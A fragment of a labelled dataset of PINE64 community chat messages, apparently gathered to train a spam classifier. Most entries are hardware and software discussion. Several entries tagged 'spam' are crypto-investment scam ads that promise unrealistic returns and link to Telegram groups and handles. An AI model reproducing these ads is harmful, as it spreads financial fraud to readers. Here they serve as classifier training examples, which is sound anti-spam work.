Pine Store Ltd. This means that any software project, merchandise vendor or community endeavour that seeks to turn a financial profit based on the PINE64 brand name needs to first acquire appropriate consent from Pine Store Ltd.\nThis is an interesting thing from their terms. As far as I know, US law doesn't allow companies to require pre-approval for trademark use. But it could be different depending on where you live.\n", "category": "good"}, {"text": "They are not based in the US.\n", "category": "good"}, {"text": "I would be surprised if EU law is significantly different.\nWhat do you mean? If you make software you can e.g.\nput 'Compatible with Windows 10' without asking microsoft's permission\non the box\nI don't know about \"allowed classes\" of trademark use, that's not what my country uses.\nIn my country, it's based on \"likelihood of confusion\".\nWell yes, there is case law for stuff like referencing a product. Which is allowed.\n>>> \u00a0an alleged infringer may assert the defenses of\u00a0fair use\u00a0and collateral use.\u00a0 Fair use allows commentary or criticism that incidentally involves the use of a trademark so long as such use is for a purpose other than that normally made of a trademark.\nhttps://www.law.cornell.edu/wex/trademark_infringement\nVery brief overview here\n", "category": "good"}, {"text": "Hey guys, is there any other thing similar to the Pinebook Pro?\nI mean, a laptop with Arm64 + Linux and not Android\n", "category": "good"}, {"text": "Just ask and you're good to go, I don't know why this has to be discussed. The rules were written because of 1-2 people severely misbehaving, while everyone else does not. \ud83d\ude04\nPanuozzo77: that maybe fits better in the offtopic channel\n", "category": "good"}, {"text": "Hi guys\nWhere can I find it? (re @p64protocolbot: [D] Panuozzo77: that maybe fits better in the offtopic channel)\nWhere can I find it?\nEdit: found (re @p64protocolbot: [D] Panuozzo77: that maybe fits better in the offtopic channel)\n", "category": "good"}, {"text": "https://t.me/pine64offtopic\n", "category": "good"}, {"text": "we have a channel for offtopic in discord\nis it not connected?\nnot sure how telegram works\nI have a question, why does pine use SD cards when SD is a proprietary format?\nShouldn't we use an open format?\nLike, assuming Pine wants to support open source\n", "category": "good"}, {"text": "Do you have an example\nEspecially one that would be supported by the hardware the Pine64 uses\nSometimes the truly open solution is not the best, nor is it at all reasonable.\nAnd a \"but not *everything* you use is open\" litmus test will only mean that you get to throw away all your computers and stare out the window for the rest of your life\n", "category": "good"}, {"text": "What would be an open alternative to the SD card?\nTaking what the SoC's can boot into account.\n", "category": "good"}, {"text": "SD has a slower spi mode that's open\nalthough who cares because absolutely no interfaces are open anyway\nalthough who cares because almost no interfaces are open anyway\n", "category": "good"}, {"text": "Hi\n", "category": "good"}, {"text": "Forwarded from unknown: I'm here to show appreciation\ud83e\udd70 to the manager who took me out from debt of over $6,000 I want to tell everyone please join this profitable platform \ud83d\udc47\ud83d\udc47\ud83d\udc47\nhttps://t.me/joinchat/C31Er4YBS6Y5YWFk\n", "category": "spam"}, {"text": "Forwarded from unknown: \ud835\ude44\ud835\ude69 \ud835\ude56\ud835\ude61\ud835\ude61 \ud835\ude68\ud835\ude69\ud835\ude56\ud835\ude67\ud835\ude69\ud835\ude5a\ud835\ude59 \ud835\ude6c\ud835\ude5e\ud835\ude69\ud835\ude5d \ud835\ude56 \ud835\ude6c\ud835\ude64\ud835\ude67\ud835\ude59 \ud835\ude69\ud835\ude64 \ud835\ude69\ud835\ude67\ud835\ude6e \ud835\ude68\ud835\ude64\ud835\ude62\ud835\ude5a\ud835\ude69\ud835\ude5d\ud835\ude5e\ud835\ude63\ud835\ude5c \ud835\ude63\ud835\ude5a\ud835\ude6c \ud835\ude5b\ud835\ude5e\ud835\ude67\ud835\ude68\ud835\ude69 \ud835\ude65\ud835\ude56\ud835\ude6e\ud835\ude62\ud835\ude5a\ud835\ude63\ud835\ude69 \ud835\ude58\ud835\ude64\ud835\ude62\ud835\ude5a \ud835\ude56\ud835\ude5b\ud835\ude69\ud835\ude5a\ud835\ude67 5\ud835\ude59\ud835\ude56\ud835\ude6e\ud835\ude68 \ud835\ude6c\ud835\ude5d\ud835\ude5a\ud835\ude63 \ud835\ude44 \ud835\ude5e\ud835\ude63\ud835\ude6b\ud835\ude5a\ud835\ude68\ud835\ude69\ud835\ude5a\ud835\ude59 $3,000 \ud835\ude56\ud835\ude63\ud835\ude59 \ud835\ude68\ud835\ude5e\ud835\ude63\ud835\ude58\ud835\ude5a \ud835\ude69\ud835\ude5d\ud835\ude5a\ud835\ude63 \ud835\ude44\nhttps://t.me/joinchat/C31Er4YBS6Y5YWFk\n", "category": "spam"}, {"text": "something might have to\nno rush, i haven't had time to do anything with it\nif you want that's fine, but my hexchat has been logging for months \ud83d\ude09\nnope, this one has the most by far\ni probably ought to mention though that a telegram captcha bot is probably more effective (and easier) than the spam classifier\npreventive rather than reactive, and means the spam doesn't get to IRC \ud83d\ude09\nyes\ni tried to start one up a few days ago but ran into technical issues\ntechnically yes, but bots could still find the invites\nwe're beyond the point of obscurity being effective\nstandard telegram background noise for groups of our sizes, afaik\nwould be nice if the telegram devs could fix their own shit, but ya know \ud83d\ude42\n", "category": "good"}, {"text": "You'll never get rid of all of the spam on Telegram. But a captcha bot can get rid of a very good portion of it.\n", "category": "good"}, {"text": "a bit of column A, a bit of column B. but from what i've read, most of the bots are programmed very lazily\nthe spam bots i mean\n", "category": "good"}, {"text": "Much like you still get a bit of noise in your gmail inbox, even though the scale is way different.\ncongratulations\n", "category": "good"}, {"text": "the end goal probably will be to have a captcha bot to handle most of the spam, and the classifier bot to clean up the rest\nwe'd already have the captcha bot, if mongodb actually built for arm64 (outside of niche cases)\nso i need to go looking for a different bot (because i really don't want to custom compile that for a production server)\n", "category": "good"}, {"text": "Hi! I\u2019m living in Korea. If I buy a pinephone ($149.99) now, Would it dispatch late november? I hope I haven\u2019t been too late.\n", "category": "good"}, {"text": "that's a decent estimate\n", "category": "good"}, {"text": "Hi, when will the pine note be released to the public?\n", "category": "good"}, {"text": "got it\n", "category": "good"}, {"text": "@Moderator spam\n", "category": "good"}, {"text": "thanks\n", "category": "good"}, {"text": "@Moderator spam\n", "category": "good"}, {"text": ".. .-.. .. -.- . ... .--. .- -- .... .. .... .. -.. . .--. .- ...-- -.. .... .... --... ...-- ...-.- (re @p64protocolbot: [I] @Moderator ... .--. .- --)\n", "category": "good"}, {"text": "If you have Bitcoin Wallet chat me for investment\n$50 profit $550\n$100 profit $1500\n$200 profit $2500\n$300 profit $3500\n$400 profit $4500\n$500 profit $5500\n$600 profit $6600\n$700 profit $7700\nPROFIT IN 24 HOURS\nNo hidden charges\nYou can make money online without depending on your salary..Do you have a PC or a phone... Try this and gain financial freedom...click on the link below\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\n@diannabrooks1\n@diannabrooks1\n", "category": "spam"}, {"text": "seeing all this pine stuff has sort of inspired me to maybe make my own stuff\nim an electrical engineer so i do some projects\nor not these sort of \"smart devices\" or however you should describe it\n", "category": "good"}, {"text": "pick up a few nutcracker boards then\n", "category": "good"}, {"text": "there's nothing special about our websites' source code. the main site and store are wordpress, the forum is mybb, and the wiki is mediawiki\nall of those are already open source \ud83d\ude42\n", "category": "good"}, {"text": "Is there a link to the video ?\n", "category": "good"}, {"text": "tripLr: which video are you referring to? I think there is some context missing\n", "category": "good"}, {"text": "I think I\u2019m going to have a pinebook pro, pinephone, and serial cable for sale\u2026\nI love my pine power and pinecil, but Havnt quite adjusted to these two\nPlus, looking to find a pinenote\n", "category": "good"}, {"text": "Lol\n", "category": "good"}, {"text": "Any suggestions for discord client for pinephone?\n", "category": "good"}, {"text": "there are a few but i forgot\nand you have to use your token lol\nand they will ban you if found out lmao\n", "category": "good"}, {"text": "There was cchat-gtk but I don't think it's being particularly actively developed\nAlso yeah custom clients are against TOS\n", "category": "good"}, {"text": "the discord client is just a bunch of JS, has nobody gotten it working on ARM?\nalso, i think you could run the android version in anbox or something\n", "category": "good"}, {"text": "browser works lol\nanbox is ass lol\n", "category": "good"}, {"text": "they collect a *lot* of analytics\nunder the /science url\n", "category": "good"}, {"text": "Anbox runs really slowly, the official client has some proprietary files in it that I guess nobody has managed to decompile?\n", "category": "good"}, {"text": "also they dont like the automation of user accounts\n", "category": "good"}, {"text": "waydroid is better from what i hear but i hate IOS and android even thoughi used an iphone 5 till the PP camne out amd have daily drove the pinephone for 2 years now\n", "category": "good"}, {"text": "Someone made an open source electron wrapper for the website that I've heard works decently but eh\n", "category": "good"}, {"text": "the official desktop client just loads the website anyway lmao\n", "category": "good"}, {"text": "It does some other special things as well\n", "category": "good"}, {"text": "yeah, for stuff like video streaming and detecting background button presses for push to talk\nhey lads, anyone know when the allwinner t723 will be released\nit's supposed to be basically the same as the rk3566\n", "category": "good"}, {"text": "I can't find much info on it\n", "category": "good"}, {"text": "it's supposedly coming out in 2021\nbut it's 2021 now\nhttps://cdn.discordapp.com/attachments/463285150898192384/903469206664794152/Allwinner-2021-2022-roadmap.png\n", "category": "good"}, {"text": "Amlogic beat them to it\n", "category": "good"}, {"text": "yeah with the s905d3 / d4 but those dont work in mobile devices\nhuh, someone's got it working\nhttps://www.cnx-software.com/2021/09/01/powkiddy-a20-an-amlogic-s905d3-powered-portable-android-game-console/\n", "category": "good"}, {"text": "That sure is a name lmao\n", "category": "good"}, {"text": "well if powkiddy managed to make it battery powered, i bet i could too\nive even got the footprint all punched in and everything\nhttps://cdn.discordapp.com/attachments/463285150898192384/903470423331708948/unknown.png\nthis was a massive pain in the ass\nshould probably upload this somewhere too in case anyone ever wants it\nhttps://cdn.discordapp.com/attachments/463285150898192384/903470611798581338/rk3566.kicad_mod\nalso these libraries\nhttps://cdn.discordapp.com/attachments/463285150898192384/903471158815494154/rk817.lib\nhttps://cdn.discordapp.com/attachments/463285150898192384/903471160736501810/rk3566.lib\nand this why not, it's the amlogic footprint\nhttps://cdn.discordapp.com/attachments/463285150898192384/903471820257243156/BGA-454_46x52_14.3x16.1mm.kicad_mod\n", "category": "good"}, {"text": "Hi, what bot is powering Pine64 Protocol Droid? Is it open source?\n", "category": "good"}, {"text": "iirc it's matterbridge\n", "category": "good"}, {"text": "Sounds likely indeed, thanks!\n", "category": "good"}, {"text": "[D] Where would I get a rainproof case? (re @p64protocolbot: [I] I'm planning to get a rain-proof case anyway)\n", "category": "good"}, {"text": "Vincent lives at many houses, he is just really fast\n@ventYl\n", "category": "good"}, {"text": "Forwarded from unknown: I\u2019m still smiling! been so beneficial trying someone new. The step taken couldn\u2019t be much. So glad i made $10k with\n\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\nhttps://t.me/joinchat/0kGAHtqDkMZjMjM0\n", "category": "spam"}, {"text": "nice @GAMELASTER\n", "category": "good"}, {"text": "?\n", "category": "good"}, {"text": "Nice cat pic\nWe want them on a regular basis \ud83d\ude04\n", "category": "good"}, {"text": "aah xD\n", "category": "good"}, {"text": "@Moderator spam\n", "category": "good"}, {"text": "hey the announcement thing has a typo, this says \"hosteboards\"\nhttps://cdn.discordapp.com/attachments/463285150898192384/903719772728987688/updatefollowup_1.png\nhey the announcement thing has a typo, this says \"hosteboards\" instead of \"hostboards\"\nhttps://cdn.discordapp.com/attachments/463285150898192384/903719772728987688/updatefollowup_1.png\n", "category": "good"}, {"text": "I cannot keep refreshing Pine64 twitter every day to get updates on the Keyboard. It has been like this for almost 50 days\nCan you please DM me so i can place a pre order so they dont run out when i try to order\n", "category": "good"}, {"text": "They'll announce in here when you can order them\n", "category": "good"}, {"text": "@Crafty gah ok, nothing to be done now \ud83d\ude1b\n", "category": "good"}, {"text": "Okay. And if anyone from the site has a salvaged PBP small side board i would appreciate adding it to the store. My USB ports have been broken for a while on one side of the laptop\nI know the PBP isnt in production but this is something that seems really basic and there\u2019s probably some nuked boards in the shop that have working spare parts that could be added to the store\n", "category": "good"}, {"text": "@Crafty fixed, not sure if it will propagate across platforms or not\n", "category": "good"}, {"text": "damn that was fast\nfellas, i've finished inputting all the amlogic soc stuff into kicad\nhttps://cdn.discordapp.com/attachments/463285150898192384/903744344492752946/s905-s922-a311.lib\n", "category": "good"}, {"text": "Seeing the Pinecil on Adrian's Digital Basement was a kick.\n", "category": "good"}, {"text": "hey lads, anyone know where i can buy an s905d3 chip\ni can find the s922x and a311d but i want the lower power one\n", "category": "good"}, {"text": "Have you checked the usual mouser, digikey, and other websites like that?\n", "category": "good"}, {"text": "that and aliexpress\n", "category": "good"}, {"text": "dormito: that info about only being able to have one set of cores active at a time is from nearly a decade ago when Linux/Android didn't have proper support for that kind of thing :)\nScroll down and have a read of the heterogeneous multi-processing section\n", "category": "good"}, {"text": "wait\nwhat\n**did you make the board?!**\n", "category": "good"}, {"text": "no i just want to buy the chip first\n", "category": "good"}, {"text": "#offtopic :)\n", "category": "good"}, {"text": "Lion scared\n", "category": "good"}, {"text": "Hi. Trying to edit a conf file in Pinephone BE (plasma), but using nano, the Ctrl-O function isn't working on the keyboard.\n", "category": "good"}, {"text": "I'm digging the new server icon ngl\nGood work\n", "category": "good"}, {"text": "Forwarded from unknown: Hurry \ud83c\uddfa\ud83c\uddf8\ud83c\uddfa\ud83c\uddf8\ud83e\udd29\ud83e\udd29\nCongratulations to everyone who benefited from this company. Believe it or live it!\nRegistration fee:$0:00\nRegistration bonus:$30\nDaily earning :$1000\nWeeky earning $7500\nMonthly:$15,000\nInstant cash out\nAsk me how\nJoin channel\nBelieve it or leave it!\nYou stay at home and make $1400 daily and receive $8500 weekly\nask me how?\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47@Crypto_Singax9\n", "category": "spam"}, {"text": "Forwarded from unknown: This is the biggest opportunity I had in making huge amount of money from the comfort of my home, continue the racks like never before I invested \u00a31000 with his company and I make huge profit of \u00a310,500 in just 48hours of trade. Thank you sir for your good works and also been honest. Reach out to him via the link below to earn massively.\n\ud83d\udd3d\ud83d\udd3d\ud83d\udd3d\ud83d\udd3d\nhttps://t.me/joinchat/NOeJDDBMA5UxMmZk\n", "category": "spam"}, {"text": "Oh, hi mark\nStrange to see you here\n", "category": "good"}, {"text": "oh neat you're in this server too\n", "category": "good"}, {"text": "I don't think so\nMaybe have a look at the radxa zero or the banana pi m2 zero\n", "category": "good"}, {"text": "Is the rockpro64 just like not supported very much? Some of the wiki info seems like it might be outdated the android builds 'boot' at best and I had something I wanted to use it for with an android application and I guess I didn't do enough research before picking one up lol.\n", "category": "good"}, {"text": "It should be able to run a regular mainline kernel\n", "category": "good"}, {"text": "@Segfault like roll a version of android with mainline kernel or?\n", "category": "good"}, {"text": "In theory most linux distros should \"just work\" as long as they have an ARM image\n", "category": "good"}, {"text": "yeah my main gripe is dual display port (DP over USB-C+HDMI) at the same time\nyeah my main gripe is dual display support (DP over USB-C+HDMI) at the same time\n", "category": "good"}, {"text": "Yeah that's gonna need a custom kernel\n", "category": "good"}, {"text": "Like 7.1->8.0->9.0 though...\n", "category": "good"}, {"text": "Hell even with a custom kernel that barely works at the moment\n", "category": "good"}, {"text": "7.1 worked great, ran great it felt good.\nno dual display.\n8.0 was slow as garbage.\n", "category": "good"}, {"text": "Pine devices generally don't get very good android support unfortunately, I don't think much of the community is particularly interested in it outside of verifying that the hardware works\n", "category": "good"}, {"text": "9.0 ran but was flashing the screen non-stop, was able to drive DP and HDMI at the same time but mirrored image\nlol\nI see\nEven the pinephone? lol\n", "category": "good"}, {"text": "There were some efforts for android on the pinephone but I haven't heard anything about them lately\nHeh\n", "category": "good"}, {"text": "I guess I'll look into rolling my own android support if I continue going down this path.\ndespite dsimic's disagreement\nWhen you have software that you want to run and don't 'own' /didn't write yourself or have source to that are only compatible with android other than antbox I don't see much choice.\nBecause I need exposed GPIO with at minimum two UART interfaces available, and dual display support.\nand I don't want to rely on software UART over GPIO or bitbanging either.\nI'm trying to come up with a drop in replacement for another board that's less powerful and runs android/some android applications on it\nin order to allow those applications to run at higher resolutions on one of the displays without lagging.\nCurrent board utilizes an H6 clocking the cortex cores at 1.8ghz\n", "category": "good"}, {"text": "Ah yes the forgotten H6 :P\n", "category": "good"}, {"text": "So I figured the RK3399 might do nicely.\nThe original board also only has 1gb of RAM.\nso the RAM upgrade was just a an addition to that and the poor performance.\nThe idea was to fab a PCB adapter to breakout the GPIO into the connectors supported by the original device so it was literally a drop in replacement.\nbut alas without proper android and dual display not gonna have a ton of luck.\n", "category": "good"}, {"text": "I'm sure I'd get crucified for suggesting it but the RPI 4 could potentially also do the job, not sure if it's got a decent Android image available or not\n", "category": "good"}, {"text": "I've got a few boards, this was just the first to arrive out of the few I'm looking at.\nNah, there's an unofficial port of lineage OS for it afaik\nand it doesn't work well\nworse than this infact.\n", "category": "good"}, {"text": ":/\n", "category": "good"}, {"text": "does the vim3 have android?\ncould be an option\n", "category": "good"}, {"text": "Does it do video over USB-C?\nIt only seems to have a single HDMI port\nOh wait it has MIPI-DSI, good luck getting that working though\n", "category": "good"}, {"text": "haha\nI mean, initially I was crazy enough to think I'd find a board with LVDS on it...\n", "category": "good"}, {"text": "Well the rockpro has eDP\nI'm not entirely sure how you'd *use* it, in Linux it's probably just a dts edit, in Android... \u00af\\_(\u30c4)_/\u00af\n", "category": "good"}, {"text": "edp is basically the same as dp\n", "category": "good"}, {"text": "Yea, I also wouldn't know how to go from eDP to LVDS (Only had luck finding adapters to do the opposite)\n", "category": "good"}, {"text": "ah I know how to do that actually\nptn3460\n", "category": "good"}, {"text": "Actually wow the rockpro has 4 display outputs, DSI, eDP, HDMI and USB-C\n", "category": "good"}, {"text": "used one in my diy'd laptop\n", "category": "good"}, {"text": "Can only do two at once though :(\n", "category": "good"}, {"text": "Would require making an adapter lol.... I don't know PCB design very well will be the first time trying to build such an adapter and that would complicate what I'd have to do heavily.\nI only need two at once lol \ud83d\ude26\nDoes the armbian build support USB-C -> DP and HDMI at the same time?\nI don't know much about what would cause it not to work kernel wise, so I'm probably in over my head if I did go down the route of trying to add the support for it in android... but what actually causes it not to work? You mentioned custom kernel; I imagine drivers?\n", "category": "good"}, {"text": "it's out of stock but this is what I have\nhttps://www.aliexpress.com/item/32835211459.html?spm=a2g0s.9042311.0.0.27424c4d3IPJco\n", "category": "good"}, {"text": "same dts but it has its own partition\ndtbo i think ?\n", "category": "good"}, {"text": "dtbos aren't really a thing outside of the rpi\n", "category": "good"}, {"text": "That listing title is so confusing lol, says it does the opposite shows on the board it doing what \"we\" would want, and then in the description says it the proper way.\ncalling it a \"driver board\" looks like there's a good amount of listings though; https://www.aliexpress.com/item/1005001369234799.html\n", "category": "good"}, {"text": "Also I'm not sure what cable you need for eDP on the rockpro\nI don't even know if there's a standard for the mainboard side of eDP cables\n", "category": "good"}, {"text": "Well I still don't know if using eDP over the USB-C->DP would solve my problem of wanting two displays anyway.\nlol\nAt this point what I wanted to do probably isn't worth the effort if I'm being honest, at least not based on the lack of performance increase I saw running the software on the rockpro\n", "category": "good"}, {"text": "Getting an install with reliably working DP alt mode will need you to use the BSP kernel most likely\n", "category": "good"}, {"text": "Unless that was more related to the android drivers/support than it was the hardware itself.\nAnother thing I'd noticed, 9.0 made my CPU fan not spin\nlol\nmaybe bad DTS.\nI just thought maybe the rockpro64 wasn't well supported considering it doesn't seem like it's talked about much, and I assume rock64 is another board as far as channels in here.\nsaw the #quartz64 was the 'newer' board but seems to have weaker hardware?\ncorrect me if I'm worng.\n*wrong\n", "category": "good"}, {"text": "eDP cabling is pretty much standardized\nthere's \"30 pin\" and \"40 pin\" cables\n", "category": "good"}, {"text": "Yeah on the display side of things\nWhat about the rockpro itself\nIt's just a flat flex connector\n", "category": "good"}, {"text": "i haven't really ever looked at that, but i'm assuming it's the same connector as on the display side\n", "category": "good"}, {"text": "Nope\neDP cables typically terminate like this on the display side\nhttps://cdn.discordapp.com/attachments/463285150898192384/903892240399736872/unknown.png\nthe rockpro just takes one of these (or something similar)\nhttps://cdn.discordapp.com/attachments/463285150898192384/903892372084129812/Flat-Flex-Cable.png\n", "category": "good"}, {"text": "yea you're right. i forgot about that. went to go look at a spare eDP panel i have sitting around \ud83d\ude42\nit is 30pin on the RP64 though, and i do see straight through adapter cables\ni would assume that is the right cable\nit wouldn't be something custom \ud83d\ude09\n", "category": "good"}, {"text": "Someone should try it :)\n", "category": "good"}, {"text": "i'd get one of those cables, but that spare display is probably a bit too power hungry (15.6\")\n", "category": "good"}, {"text": "I've got a quartz and an eDP panel somewhere, if noone's tried it by the time video output works on the quartz I'll buy a cable and give it a go\nI'll have a look at the schematic, maybe see what regulator is powering that connector\n(I'm doing a lot of schematic checking today lol)\n", "category": "good"}, {"text": "if 15.6\" is too power hungry in my application it def would not work lol\n", "category": "good"}, {"text": "i'm guessing there. i'm just concerned about the backlight power consumption\nneed to check schematic for RP and datasheet for a given panel\n", "category": "good"}, {"text": "Most large signage displays probably use an external power source for the backlight\n", "category": "good"}, {"text": "This one is driven directly off the board, given the board gets supplied additional power from a power unit\nMy plan was actually to do something stupid and go USB-C->HDMI (Or DP->HDMI off USB-C) into an LVDS driver board.\nbecause the driver board takes an external power source\n", "category": "good"}, {"text": "It seems like on the rockpro the edp port can draw power from VCCA_0V9 and VCC1V8_DVP\n", "category": "good"}, {"text": "to feed the needed power into the display\n", "category": "good"}, {"text": "Oh wait it seems like backlight power comes from EDPAUXP\n", "category": "good"}, {"text": "i'm pretty sure display backlights run off a beefier rail than 1v8...\n", "category": "good"}, {"text": "Which from what I can tell draws from VCC3V3_S0\nThis seems to be the eDP connector on the rockpro\nhttps://cdn.discordapp.com/attachments/463285150898192384/903894303930195988/unknown.png\nApparently VCC3V3_S0 comes from the RK808\n", "category": "good"}, {"text": "oh ok, that backlight rail is straight from 12V Vcc\n", "category": "good"}, {"text": "Wait 12V?\n", "category": "good"}, {"text": "that's all i was really worried about\n", "category": "good"}, {"text": "Oh yeah there it is lol\n", "category": "good"}, {"text": "so as long as your power brick is up to the task, should be a non-issue\n", "category": "good"}, {"text": "Yep\nI'd imagine most panels don't draw more than 5W or so\n", "category": "good"}, {"text": "12v is what's being driven into this LVDS display I'm referring to\nI think it has two separate 12v inputs though\n", "category": "good"}, {"text": "I doubt the LVDS connector itself is rated for whatever crazy wattage those big signage panels use if that's what you're talking about\ndsimic: bah that's yet another reason the next PBP should use a 2s battery config\n", "category": "good"}, {"text": "a big commercial sign panel is definitely not getting powered via LVDS\nat least not the main drive power. there may be logic power via that\n", "category": "good"}, {"text": "@fireTwoOneNine what were those generic cables you were talking about?\n", "category": "good"}, {"text": "i just found them on aliexp https://www.aliexpress.com/i/32756336009.html\n", "category": "good"}, {"text": "LOL\nhttps://cdn.discordapp.com/attachments/463285150898192384/903895636464762910/unknown.png\nWell you're right in that they seem to be a direct pass through, I wonder what the pinout of the eDP connector itself is\n", "category": "good"}, {"text": "https://cdn.discordapp.com/attachments/463285150898192384/903895907353903124/iu.png\n", "category": "good"}, {"text": "Excuse my ignorance but when is the rk sd tool used? For most of these things I've just been using etcher.\nare there actually cases where you'd want/need that sd tool\n", "category": "good"}, {"text": "you don't need to worry about that tool\n", "category": "good"}, {"text": "Yeah sure enough that pinout looks like a match\n", "category": "good"}, {"text": "all the images we have are made to be directly flashed to SD or eMMC\n", "category": "good"}, {"text": "Niiice so those generic cables should work great then\n", "category": "good"}, {"text": "I like how you both just went down an eDP rabbit hole out of curiosity of how it's used lol.\nor implemented rather.\n", "category": "good"}, {"text": "It's good to know these things :P\n", "category": "good"}, {"text": "I'm not judging\nThe amount of crap I know about android I didn't a month ago is beyond what I wanted to ever know about it...\nbecause 'it's good to know these things'\nlol\nI'm more of a software guy than hardware though.\n", "category": "good"}, {"text": "i jumped into this conversation late and didn't read the context until later \ud83d\ude1b\n", "category": "good"}, {"text": "Actually fire you might find some of the scrollback in #pinebook somewhat interesting, we discovered why the main-daughterboard cable in the PBP is so damn wide\n", "category": "good"}, {"text": "So again, excuse my ignorance but, is fire not one of the people who designed some of this stuff?\n", "category": "good"}, {"text": "I think they were mostly designed externally\n", "category": "good"}, {"text": "afraid i'm not. i'm pretty knowledgeable on a lot of the hardware (and designing new hardware), but for P64 i'm basically just a sysadmin\n", "category": "good"}, {"text": "Also I must say, trying to get one of these running for the first time... was nerve racking.\nI don't have an emmc module yet; and the wiki is basically 'if your lights blink it works'\nlol\nso I plug an sd card in with an android image\nhave no idea how to establish UART except that the wiki tells you not to do it prior to U-Boot SPL\nfor the rockchip\nso had no idea what was going wrong\nor the fact I had to push a power button\nlol\n", "category": "good"}, {"text": "Huh I thought the rockpro powered on as soon as it got power, the quartz definitely does\n", "category": "good"}, {"text": "the rp64 definitely powers on when it gets plugged in\n", "category": "good"}, {"text": "There's power for sure, the ethernet starts lighting up; but I've had to hit the power button\nevery time I've loaded a new image\n", "category": "good"}, {"text": "but the android images may be weird, idk\n", "category": "good"}, {"text": "This was on armbian too\n", "category": "good"}, {"text": "\u00af\\_(\u30c4)_/\u00af\n", "category": "good"}, {"text": "when android wasn't working I went with armbian\nNothing happened till I hit power button, then fan started spinning and I was excited/enamored because I didn't get a brick lol\nThen somewhat impatiently waited for HDMI to come up\nsaw the armbian login screen\n", "category": "good"}, {"text": "actually maybe RP does need you to press the power button. it's been a while since i used mine \ud83d\ude12\n", "category": "good"}, {"text": "and went back to the android builds\n", "category": "good"}, {"text": "anyway, the docs around the android builds are probably sparse and archaic -- they were mostly just test images when the device was brand new\nvery few people use them\n", "category": "good"}, {"text": "I've realized as much haha.\n", "category": "good"}, {"text": "doesn't even auto-resize the partitions lol\nhttps://cdn.discordapp.com/attachments/463285150898192384/903898272345759754/unknown.png\n", "category": "good"}, {"text": "The unfortunate thing is I was skeptical about other boards because their android support was advertised as pretty much being 'unofficial' saw the pine wiki and was like wow there's a lot here, this must be an actively supported board and they have android builds\nand the wiki was well organized\ndeceiving bastards with your organized stuff lol\n", "category": "good"}, {"text": "you're in a tiny minority needing android on an SBC \ud83d\ude09\n", "category": "good"}, {"text": "I know \ud83d\ude26\nIf I had a choice it wouldn't be android lol.\n", "category": "good"}, {"text": "if those old test android images don't work out for you, you honestly might be better off running waydroid on linux lmao\n", "category": "good"}, {"text": ":reeee:\n", "category": "good"}, {"text": "never heard of waydroid\nis there performance impact?\n", "category": "good"}, {"text": "Anbox but less crap performance\n", "category": "good"}, {"text": "^ that\n", "category": "good"}, {"text": "The complication would be dual display\n", "category": "good"}, {"text": "I'm not sure how performance compares to native\nAlso USB-C support on mainline linux is \"a bit dodgy\" at the moment\n", "category": "good"}, {"text": "waydroid supposedly works pretty damn well on the pinephone pro, which is also RK3399 (downclocked from RP64, even)\n", "category": "good"}, {"text": "PPP is also running a single display at 720p\n", "category": "good"}, {"text": "lame\n", "category": "good"}, {"text": "the problem with waydroid if anything would be CPU not GPU\n", "category": "good"}, {"text": "The SBC world is weird right now.\n", "category": "good"}, {"text": "It might work on a BSP kernel but don't even ask me how you'd get the blob Mali driver working\n", "category": "good"}, {"text": "You go either pi4/pine or some dev board\nor some really weird chineese board supported by one guy\nwho posts a ton of random source on github\nand hope it can compile\nlol\nThat's personal experience thus far\n", "category": "good"}, {"text": "Things have improved a lot lately but yeah it's still a bit archaic, especially if you can't deal with missing certain features like USB-C alt mode\n", "category": "good"}, {"text": "Well even if USB-C isn't there if I can go eDP to LVDS and still draw enough power for it to work.\n", "category": "good"}, {"text": "fwiw USB alt mode *does* work on mainline, it's just very unreliable, probably not ideal for signage lol\n", "category": "good"}, {"text": "This isn't signage, but yeah..\nlol\n", "category": "good"}, {"text": "Yep eDP to LVDS would probably work well, the main problem then would just be reliability of waydroid and whether it performs well enough\n", "category": "good"}, {"text": "So to give an idea of what this is; it's a virtual pinball machine.\n", "category": "good"}, {"text": "RK3399 is quick but it's not magic\n", "category": "good"}, {"text": "and the reason for two displays is the \"DMD (Dot Matrix Display)\" despite it being an actual monitor in this case.\nwhere the game renders to a 'presentation api' in android\nto put that onto that second screen\n", "category": "good"}, {"text": "Huh that's pretty cool\n", "category": "good"}, {"text": "the main screen is the play area where you see the 'play field' and the ball moving around and such\n", "category": "good"}, {"text": "Actually I wonder if the eDP output would work with Android\n", "category": "good"}, {"text": "They shipped them with 720p, and 1080p runs fine on a lot of it except this one that emulates actual pinball roms\nso I'm guessing heavier compute involved.\n", "category": "good"}, {"text": "Specifically the Android 7 image you said performed fine\n", "category": "good"}, {"text": "it seemed like it did, or better than the rest.\nHDMI seemed more functional\nand my CPU fan worked\nlol\n", "category": "good"}, {"text": "Yeah now I'm curious if eDP would work with that image\n", "category": "good"}, {"text": "Yeah, so; in some cases some people replace their display with non LVDS ones\ndsimic: Yeah no rush on this, it's more of an experiment than anything.\nI just wanted to see if things -could- run better.\nThese pinball things shipped with 1080p displays but drove 720p at software level\n", "category": "good"}, {"text": "Everyone's eagerly awaiting dp alt mode being fixed lol\n", "category": "good"}, {"text": "Oh I meant than the stock PCB.\nheh.\nI have no idea, I've just started using it tonight.\nI think it stays powered down\nbut I'm using the button to turn it off.\nSegfault some other cool things about these virtual pinball things is that they have feedback mechanisms via push solenoids.\nThat's why the 2 UART interfaces are necessary\none accepts input the other gets written to for the feedback mechanism to be fired.\n", "category": "good"}, {"text": "Oh I see\n", "category": "good"}, {"text": "when bumpers/slingshots are hit.\n", "category": "good"}, {"text": "I'd have expected things like that to use I2C\n", "category": "good"}, {"text": "There's a gyro hooked to i2c\nbut that's about it\nI don't know that I've 'discovered' any issues lol.\nI tried to run android, and was told android doesn't work \ud83d\ude1b\nI imagine a lot of those 'problems' are isolated to android itself\nor the kernels being used in those builds\n", "category": "good"}, {"text": "If the program you were running was able to work on Linux I'd say run BSP Debian, that way dp alt mode works perfectly\n", "category": "good"}, {"text": "Yeah, I'm not complaining about it just saying that I don't really expect those issues to be fixed lol.\nI'm gonna try waydroid on armbian\n", "category": "good"}, {"text": "The waydroid part should work, I think it's a mainline kernel so dp alt mode may or may not\nAs for performance in waydroid... \u00af\\_(\u30c4)_/\u00af\n", 